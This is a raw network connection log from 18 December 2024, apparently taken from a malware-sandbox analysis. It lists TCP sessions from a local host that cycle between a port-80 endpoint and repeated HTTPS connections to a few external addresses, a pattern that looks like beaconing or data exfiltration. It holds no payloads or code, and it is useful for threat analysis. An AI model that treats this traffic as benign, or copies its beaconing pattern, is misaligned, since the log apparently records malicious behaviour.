                                                                                                          Dec 18, 2024 09:51:52.084690094 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.095983982 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.096183062 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.098651886 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.098727942 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.109029055 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.109321117 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.112293005 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.112374067 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.122765064 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.122963905 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.125560999 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.125649929 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.136241913 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.136301994 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.143277884 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.143349886 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.152822018 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.152896881 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.152909994 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.152956963 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.164948940 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.165020943 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.190167904 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.190361023 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.190424919 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.190500021 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.214386940 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.214579105 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.214641094 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.214934111 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.216676950 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.216861010 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.219568014 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.219765902 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.219796896 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.219865084 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.226336956 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.226402998 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.226485014 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.226546049 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.238176107 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.238249063 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.239475012 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.239574909 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.239636898 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.239711046 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.249038935 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.249119043 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.249175072 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.249237061 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.259852886 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.260157108 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.260220051 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.260291100 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.270275116 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.270464897 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.270478964 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.270545006 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.280153036 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.280217886 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.280303955 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.280369043 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.290436983 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.290501118 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.290537119 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.290595055 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.300390005 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.300561905 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.300622940 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.300920963 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.310507059 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.310723066 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.310786009 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.310859919 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.320852995 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.320938110 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.321010113 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.321188927 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.330214024 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.330395937 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.330975056 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.331135035 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.339201927 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.339266062 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.339339018 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.339400053 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.348210096 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.348278046 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.348295927 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.348370075 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.356964111 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.357053041 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.357083082 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.357146025 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.357161999 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.357218027 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.358258963 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.358341932 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.358376026 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.358464003 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.358545065 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.720832109 CET4973880192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:51:52.840454102 CET8049738158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.840682030 CET4973880192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:51:52.841017008 CET4973880192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:51:52.960481882 CET8049738158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:51:54.497431993 CET8049738158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:51:54.503520966 CET4973880192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:51:54.623179913 CET8049738158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:51:54.875744104 CET8049738158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:51:54.919929981 CET4973880192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:51:55.416953087 CET49739443192.168.2.4172.67.177.134
                                                                                                          Dec 18, 2024 09:51:55.416994095 CET44349739172.67.177.134192.168.2.4
                                                                                                          Dec 18, 2024 09:51:55.417062044 CET49739443192.168.2.4172.67.177.134
                                                                                                          Dec 18, 2024 09:51:55.421114922 CET49739443192.168.2.4172.67.177.134
                                                                                                          Dec 18, 2024 09:51:55.421128035 CET44349739172.67.177.134192.168.2.4
                                                                                                          Dec 18, 2024 09:51:56.645708084 CET44349739172.67.177.134192.168.2.4
                                                                                                          Dec 18, 2024 09:51:56.645787001 CET49739443192.168.2.4172.67.177.134
                                                                                                          Dec 18, 2024 09:51:56.648957968 CET49739443192.168.2.4172.67.177.134
                                                                                                          Dec 18, 2024 09:51:56.648967028 CET44349739172.67.177.134192.168.2.4
                                                                                                          Dec 18, 2024 09:51:56.649414062 CET44349739172.67.177.134192.168.2.4
                                                                                                          Dec 18, 2024 09:51:56.653086901 CET49739443192.168.2.4172.67.177.134
                                                                                                          Dec 18, 2024 09:51:56.695374012 CET44349739172.67.177.134192.168.2.4
                                                                                                          Dec 18, 2024 09:51:57.078752041 CET44349739172.67.177.134192.168.2.4
                                                                                                          Dec 18, 2024 09:51:57.078912973 CET44349739172.67.177.134192.168.2.4
                                                                                                          Dec 18, 2024 09:51:57.078973055 CET49739443192.168.2.4172.67.177.134
                                                                                                          Dec 18, 2024 09:51:57.102857113 CET49739443192.168.2.4172.67.177.134
                                                                                                          Dec 18, 2024 09:52:02.758761883 CET4973880192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:02.878340960 CET8049738158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:03.677910089 CET8049738158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:03.732495070 CET4973880192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:03.819334030 CET49752443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:03.819375992 CET44349752149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:03.819448948 CET49752443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:03.819968939 CET49752443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:03.819987059 CET44349752149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:05.179444075 CET44349752149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:05.179518938 CET49752443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:05.192738056 CET49752443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:05.192750931 CET44349752149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:05.193025112 CET44349752149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:05.203378916 CET49752443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:05.247328997 CET44349752149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:05.248632908 CET49752443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:05.248637915 CET44349752149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:05.808779001 CET44349752149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:05.808887959 CET44349752149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:05.808938026 CET49752443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:05.809272051 CET49752443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:06.007378101 CET4973880192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:06.008771896 CET4975780192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:06.127540112 CET8049738158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:06.127664089 CET4973880192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:06.128264904 CET8049757158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:06.128345013 CET4975780192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:06.128499031 CET4975780192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:06.248857975 CET8049757158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:07.328689098 CET8049757158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:07.329874992 CET49758443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:07.329904079 CET44349758149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:07.329968929 CET49758443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:07.330523968 CET49758443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:07.330535889 CET44349758149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:07.373361111 CET4975780192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:08.691282034 CET44349758149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:08.692854881 CET49758443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:08.692867994 CET44349758149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:08.692924023 CET49758443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:08.692931890 CET44349758149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:09.326138973 CET44349758149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:09.326340914 CET44349758149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:09.326539040 CET49758443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:09.326863050 CET49758443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:09.358577967 CET4976380192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:09.478122950 CET8049763158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:09.478343964 CET4976380192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:09.478343964 CET4976380192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:09.598937035 CET8049763158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:10.678323984 CET8049763158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:10.679742098 CET49769443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:10.679852009 CET44349769149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:10.680107117 CET49769443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:10.680491924 CET49769443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:10.680529118 CET44349769149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:10.732707977 CET4976380192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:12.041467905 CET44349769149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:12.043730021 CET49769443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:12.043796062 CET44349769149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:12.043879032 CET49769443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:12.043894053 CET44349769149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:12.665818930 CET44349769149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:12.666013956 CET44349769149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:12.666104078 CET49769443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:12.666341066 CET49769443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:12.778105021 CET4976380192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:12.778599024 CET4977580192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:12.899367094 CET8049763158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:12.899458885 CET8049775158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:12.899482965 CET4976380192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:12.899549961 CET4977580192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:12.899662971 CET4977580192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:13.019123077 CET8049775158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:14.101454973 CET8049775158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:14.103673935 CET49777443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:14.103708982 CET44349777149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:14.103785038 CET49777443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:14.103988886 CET49777443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:14.104006052 CET44349777149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:14.154375076 CET4977580192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:15.466722965 CET44349777149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:15.473031044 CET49777443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:15.473048925 CET44349777149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:15.473099947 CET49777443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:15.473110914 CET44349777149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:16.296406984 CET44349777149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:16.296608925 CET44349777149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:16.296659946 CET49777443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:16.296960115 CET49777443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:16.317152977 CET4977580192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:16.317732096 CET4978380192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:16.437355995 CET8049775158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:16.437424898 CET8049783158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:16.437453032 CET4977580192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:16.437489033 CET4978380192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:16.437601089 CET4978380192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:16.557118893 CET8049783158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:18.055922031 CET8049783158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:18.057611942 CET49788443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:18.057715893 CET44349788149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:18.057813883 CET49788443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:18.058098078 CET49788443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:18.058139086 CET44349788149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:18.107712984 CET4978380192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:19.422358990 CET44349788149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:19.423902035 CET49788443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:19.423979044 CET44349788149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:19.424150944 CET49788443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:19.424169064 CET44349788149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:19.981221914 CET44349788149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:19.981403112 CET44349788149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:19.981482983 CET49788443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:19.981939077 CET49788443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:20.003865004 CET4978380192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:20.004488945 CET4979480192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:20.123945951 CET8049783158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:20.124036074 CET8049794158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:20.124135017 CET4978380192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:20.124146938 CET4979480192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:20.124254942 CET4979480192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:20.243772984 CET8049794158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:21.787307978 CET8049794158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:21.788502932 CET49800443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:21.788595915 CET44349800149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:21.788676023 CET49800443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:21.788928032 CET49800443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:21.788964033 CET44349800149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:21.841994047 CET4979480192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:23.150466919 CET44349800149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:23.152019024 CET49800443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:23.152102947 CET44349800149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:23.152179003 CET49800443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:23.152194023 CET44349800149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:23.826190948 CET44349800149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:23.826370001 CET44349800149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:23.826466084 CET49800443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:23.826827049 CET49800443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:23.848823071 CET4979480192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:23.849862099 CET4980680192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:23.968764067 CET8049794158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:23.968827009 CET4979480192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:23.969445944 CET8049806158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:23.969523907 CET4980680192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:23.969630957 CET4980680192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:24.089133024 CET8049806158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:25.762916088 CET8049806158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:25.764672041 CET49812443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:25.764697075 CET44349812149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:25.769392014 CET49812443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:25.769666910 CET49812443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:25.769680977 CET44349812149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:25.810657978 CET4980680192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:27.130356073 CET44349812149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:27.132030964 CET49812443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:27.132040977 CET44349812149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:27.132086039 CET49812443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:27.132093906 CET44349812149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:27.776386023 CET44349812149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:27.776583910 CET44349812149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:27.776648998 CET49812443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:27.776906013 CET49812443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:27.794722080 CET4980680192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:27.795830965 CET4981880192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:27.914753914 CET8049806158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:27.914850950 CET4980680192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:27.915421963 CET8049818158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:27.915642977 CET4981880192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:27.915771961 CET4981880192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:28.164829969 CET8049818158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:29.121165037 CET8049818158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:29.127120972 CET49819443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:29.127198935 CET44349819149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:29.127270937 CET49819443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:29.131175995 CET49819443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:29.131211996 CET44349819149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:29.170034885 CET4981880192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:30.490808010 CET44349819149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:30.492400885 CET49819443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:30.492425919 CET44349819149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:30.492479086 CET49819443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:30.492490053 CET44349819149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:31.173569918 CET44349819149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:31.173767090 CET44349819149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:31.173851967 CET49819443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:31.174037933 CET49819443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:31.199358940 CET4981880192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:31.200084925 CET4982580192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:31.319278002 CET8049818158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:31.319380045 CET4981880192.168.2.4158.101.44.242
